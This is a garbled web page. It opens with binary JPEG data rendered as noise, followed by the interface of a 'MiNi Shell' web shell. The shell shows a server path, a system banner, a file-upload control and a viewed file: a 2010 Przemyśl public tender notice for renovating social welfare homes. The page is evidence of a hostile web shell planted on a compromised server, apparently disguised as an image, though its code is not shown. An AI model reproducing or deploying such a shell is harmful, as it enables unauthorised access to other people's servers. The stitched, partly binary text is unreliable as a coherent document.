JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100623/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100623/180410-N-2010.html

<p class="kh_header"><b>Przemyśl: Roboty budowlane w Domach Pomocy Społecznej oraz Miejskim Ośrodku Pomocy Społecznej  w Przemyślu w ramach Projektu Rozwój Usług Socjalnych na terenie miasta Przemyśla - realizowanego w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2007-2013 Działanie 5.2. Infrastruktura ochrony zdrowia i pomocy społecznej.</b><br>
<b>Numer ogłoszenia: 180410 - 2010; data zamieszczenia: 23.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Przemyśl - Prezydent Miasta Przemyśl , ul. Rynek 1, 37-700 Przemyśl, woj. podkarpackie, tel. 016 6782962, 6752072, faks 016 6786449.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przemysl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty budowlane w Domach Pomocy Społecznej oraz Miejskim Ośrodku Pomocy Społecznej  w Przemyślu w ramach Projektu Rozwój Usług Socjalnych na terenie miasta Przemyśla - realizowanego w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2007-2013 Działanie 5.2. Infrastruktura ochrony zdrowia i pomocy społecznej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje wykonanie następujących robót z podziałem na cztery zadania  częściowe: 

Zadanie Nr 1 - Remont kompleksowy obiektów Domu Pomocy Społecznej w Przemyślu przy ul. Wysockiego 99, w tym:
1.Remont kompleksowy budynku kuchni głównej - rob. ogólnobudowlane   ( roboty izolacyjne ścian, wymiana konstrukcji8 dachu z pokryciem, wymiana stolarki okiennej i drzwiowej,  roboty posadzkowe i okładzinowe, roboty malarskie ) ,wraz z modernizacją ciągu technologicznego produkcji posiłków oraz wymianą  instalacji wewnętrznych:- inst. wod. -  kan.- inst. c.o.,- inst c.w.u., - inst. wentylacji, - inst. elektryczna
2. Remont kompleksowy budynku warsztatowo - administracyjnego  z adaptacją części powierzchni na pomieszczenia terapeutyczne ,-  roboty ogólnobudowlane ( roboty izolacyjne ścian + ocieplenie, wymiana stropu, remont dachu, wymiana stolarki okiennej i drzwiowej, roboty posadzkowe i okładzinowe, roboty malarskie) wraz wymianą  instalacji wewnętrznych:  inst. monitoringu, - inst. elektryczna,- inst. c.o.,- inst. wod. - kan.- inst. c.w.u.
3. Remont kompleksowy budynku gospodarczego z przeznaczeniem na warsztat dla konserwatorów - roboty ogólnobudowlane ( roboty izolacyjne ścian + ocieplenie, wymiana stropu, wymiana konstrukcji dachu z pokryciem, wymiana stolarki okiennej i drzwiowej ) wraz z wymianą instalacji:
- inst. wod. -  Kan.,  inst. c.o., inst c.w.u., przyłącze kanalizacyjne, przyłącze c.c.w., inst. elektryczna
4. Remont kompleksowy budynku portierni - roboty ogólnobudowlane ( roboty izolacyjne ścian + ocieplenie, wymiana konstrukcji dachu z pokryciem, wymiana stolarki okiennej i drzwiowej, roboty posadzkowe i okładzinowe) wraz z wymianą  instalacji: inst. wod. -  kan.,  inst. elektryczna
5. Remont kompleksowy dróg wewnętrznych i ogrodzenia terenu wraz z wymianą/wykonaniem: 
- bram wjazdowych przesuwnych
- wewnętrznej sieci wodociągowej
- instalacji nadzoru telewizyjnego CCTV budynków

Zadanie Nr 2 Remont kompleksowy obiektów Domu Pomocy Społecznej w Przemyślu przy 
ul. Świętego Brata Alberta 3,w tym:
1. Wykonanie nadbudowy budynku głównego (wykonanie poddasza mieszkalnego i kaplicy) z niezbędną infrastrukturą.
2. Adaptacja pralni na magazyny, pomieszczenia biurowe oraz pomieszczenia terapii zajęciowej.
3. Zagospodarowanie terenu wokół budynku, w tym:
- wykonanie parkingu
- modernizacja ogrodzenia
- wymiana bramy wjazdowej i furtki

Zadanie Nr 3 Dostosowanie budynku przy ul. Dworskiego 98 w Przemyślu dla potrzeb Miejskiego Ośrodka Pomocy Społecznej, w tym:
1. Dobudowanie do budynku schodów zewnętrznych.
2. Wykonanie zadaszenia nad schodami.
3. Montaż windy zewnętrznej przystosowanej dla potrzeb osób niepełnosprawnych.
4. Przełożenie odcinka kanalizacji ogólnospławnej z powodu kolizji z fundamentem pod windę.
5. Wykonanie ogrodzenia wraz z montażem bramy przesuwnej.
Zadanie Nr 4 Remont budynku Miejskiego Ośrodka Pomocy Społecznej w Przemyślu przy 
ul. Leszczyńskiego 3,w tym:
1. Ocieplenie ścian zewnętrznych budynku.
2. Wymiana ogrodzenia budynku wraz z bramą i furtkami.
3. Wykonanie nowych miejsc parkingowych, remont nawierzchni placu manewrowego.
4. Uzupełnienie kanalizacji deszczowej.
5. Wykonanie klimatyzacji w Sali szkoleniowej.

2. Szczegółowy opis i wymagania dotyczące realizacji przedmiotu zamówienia określone są w załączniku nr 1 ( dokumentacja projektowa wraz z przedmiarem oraz Specyfikacja Techniczna Wykonywania i Odbioru Robót) ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.52.22-9, 45.21.52.22-9, 45.23.32.26-9, 45.23.31.61-5, 45.34.20.00-6, 45.26.00.00-7, 45.30.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie Nr 1 
Warunek zostanie spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedno zadanie polegające na wykonaniu przebudowy lub remontu obiektu  kubaturowego obejmujący swym zakresem wykonanie robót ogólnobudowlanych i instalacyjnych odpowiadających rodzajowi robót objętych przedmiotem zamówienia na  kwotę nie mniejszą niż  1.000.000,00 PLN   udokumentowane, że zostało wykonane zgodnie z zasadami sztuki budowlanej (z należytą starannością).
Zadanie Nr 2  
Warunek zostanie spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedno zadanie polegające na wykonaniu przebudowy lub remontu obiektu  kubaturowego obejmujący swym zakresem wykonanie robót ogólnobudowlanych i instalacyjnych odpowiadających rodzajowi robót objętych przedmiotem zamówienia na  kwotę nie mniejszą niż  300.000,00 PLN   udokumentowane, że zostało wykonane zgodnie z zasadami sztuki budowlanej (z należytą starannością).
Zadanie Nr 3 
Warunek zostanie spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedno zadanie polegające na wykonaniu przebudowy lub remontu obiektu  kubaturowego obejmujący swym zakresem wykonanie robót ogólnobudowlanych odpowiadających rodzajowi robót objętych przedmiotem zamówienia  kwotę nie mniejszą niż  100.000,00 PLN   udokumentowane, że zostało wykonane zgodnie z zasadami sztuki budowlanej (z należytą starannością)
Zadanie Nr 4 
Warunek zostanie spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedno zadanie polegające na wykonaniu przebudowy lub remontu obiektu  kubaturowego obejmujący swym zakresem wykonanie robót ogólnobudowlanych odpowiadających rodzajowi robót objętych przedmiotem zamówienia  kwotę nie mniejszą niż  100.000,00 PLN   udokumentowane, że zostało wykonane zgodnie z zasadami sztuki budowlanej (z należytą starannością).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie Nr 1 
Warunek zostanie spełniony, jeżeli wykonawca będzie dysponował osobami, które posiadają uprawnienia budowlane w zakresie niezbędnym do wykonania przedmiotu zamówienia (oraz przynależą na dzień składania ofert do właściwej izby samorządu zawodowego) w następujących specjalnościach:
-	kierownik budowy - uprawnienia konstrukcyjno-budowlane,
-	kierownik robót - uprawnienia w specjalności instalacje sanitarne ( wod-kan, c.o., cwu 
-	i wentylacji) 
-	kierownik robót - uprawnienia w specjalności instalacje elektryczne 
-	lub przedstawi pisemne zobowiązanie innych podmiotów o których mowa w art. 26 b uPzp.
Zadanie Nr 2 
Warunek zostanie spełniony, jeżeli wykonawca będzie dysponował osobami, które posiadają uprawnienia budowlane w zakresie niezbędnym do wykonania przedmiotu zamówienia (oraz przynależą na dzień składania ofert do właściwej izby samorządu zawodowego) w następujących specjalnościach:
-	kierownik budowy - uprawnienia konstrukcyjno-budowlane,
-	kierownik robót - uprawnienia w specjalności instalacje sanitarne ( wod-kan, c.o., cwu)
-	 kierownik robót - uprawnienia w specjalności instalacje elektryczne
Zadanie Nr 3 
Warunek zostanie spełniony, jeżeli wykonawca będzie dysponował osobami, które posiadają uprawnienia budowlane w zakresie niezbędnym do wykonania przedmiotu zamówienia (oraz przynależą na dzień składania ofert do właściwej izby samorządu zawodowego) w następujących specjalnościach:
-	kierownik budowy - uprawnienia konstrukcyjno-budowlane,
kierownik robót - uprawnienia w specjalności instalacje elektryczne
Zadanie Nr 4 
Warunek zostanie spełniony, jeżeli wykonawca będzie dysponował osobami, które posiadają uprawnienia budowlane w zakresie niezbędnym do wykonania przedmiotu zamówienia (oraz przynależą na dzień składania ofert do właściwej izby samorządu zawodowego) w następujących specjalnościach:
-	kierownik budowy - uprawnienia konstrukcyjno-budowlane,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie Nr 1 
 Warunek zostanie spełniony, jeżeli wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej i posiada opłaconą polisę, a w przypadku jej braku inny dokument ubezpieczenia OC  na kwotę ubezpieczenia min. 500 000,00  zł.
Zadanie Nr 2 
 Warunek zostanie spełniony, jeżeli wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej i posiada opłaconą polisę, a w przypadku jej braku inny dokument ubezpieczenia OC  na kwotę ubezpieczenia min. 200 000,00  zł.
Zadanie Nr 3 
 Warunek zostanie spełniony, jeżeli wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej i posiada opłaconą polisę, a w przypadku jej braku inny dokument ubezpieczenia OC  na kwotę ubezpieczenia min. 200 000,00  zł.
Zadanie Nr 4 
 Warunek zostanie spełniony, jeżeli wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej i posiada opłaconą polisę, a w przypadku jej braku inny dokument ubezpieczenia OC  na kwotę ubezpieczenia min. 100 000,00  zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony i podpisany przez osoby upoważnione do reprezentowania Wykonawcy Formularz oferty według wzoru stanowiącego załącznik Nr 2 do SIWZ 
2) pełnomocnictwo osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę o ile osoba reprezentująca wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jej reprezentacji we właściwym rejestrze.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wprowadzenie zmian do umowy może wynikać z następujących okoliczności:
1)	zmian regulacji prawnych obowiązujących w dniu podpisania umowy.
2)	gdy z przyczyn organizacyjnych konieczna będzie zmiana osób upoważnionych do  
           wykonania określonych czynności, zmiana danych teleadresowych określonych niniejszą umową,
3)	w zakresie wydłużenia terminu obowiązywania umowy pod warunkiem:
a)	 że zaszła konieczność udzielenia zamówienia dodatkowego, którego wykonanie w sposób
obiektywny uniemożliwia terminowe zakończenie przedmiotu umowy, 
b)	wystąpiły złe warunki atmosferyczne uniemożliwiające prowadzenie robót zgodnie 
z zasadami sztuki budowlanej lub normami technicznymi lub, że ta zmiana wynika 
z okoliczności których Wykonawca nie mógł przewidzieć na etapie składania oferty 
i nie jest przez niego zawiniona.
c)	Na uzasadniony wniosek Wykonawcy pod warunkiem, że zmiana ta wynika z okoliczności których Wykonawca nie mógł przewidzieć na etapie składania oferty i nie jest przez niego zawiniona. 
d)	Wprowadzenia zmian w stosunku do dokumentacji projektowej na wykonanie robót zamiennych nie wykraczających poza zakres przedmiotu zamówienia, na uzasadniony wniosek Wykonawcy , Zamawiającego lub Projektanta przy możliwej modyfikacji wynagrodzenia Wykonawcy w sytuacji koniecznego zwiększenia bezpieczeństwa realizacji robót, usprawnienia procesu  budowy bądź usunięcia wad ukrytych dokumentacji projektowej założonego efektu końcowego.

4)	Zmiany technologii wykonania robót, a co za tym idzie wynagrodzenia Wykonawcy na wniosek Wykonawcy lub Zamawiającego, pod warunkiem, że zmiana ta będzie korzystna dla Zamawiającego,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przemysl.pl BIP Zamówienia publiczne  Roboty budowlane<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wieloosobowe Stanowisko ds. Zamówień Publicznych  Urząd Miejski w Przemyślu 
ul. Ratuszowa 10A 37-700 Przemyśl pok. 205.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.07.2010 godzina 10:00, miejsce: Wieloosobowe Stanowisko ds. Zamówień Publicznych  Urząd Miejski w Przemyślu 
ul. Ratuszowa 10A 37-700 Przemyśl pok. 205.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Regionalny Programu Operacyjnego Województwa Podkarpackiego na lata 2007-2013 Działanie 5.2. Infrastruktura ochrony zdrowia i pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com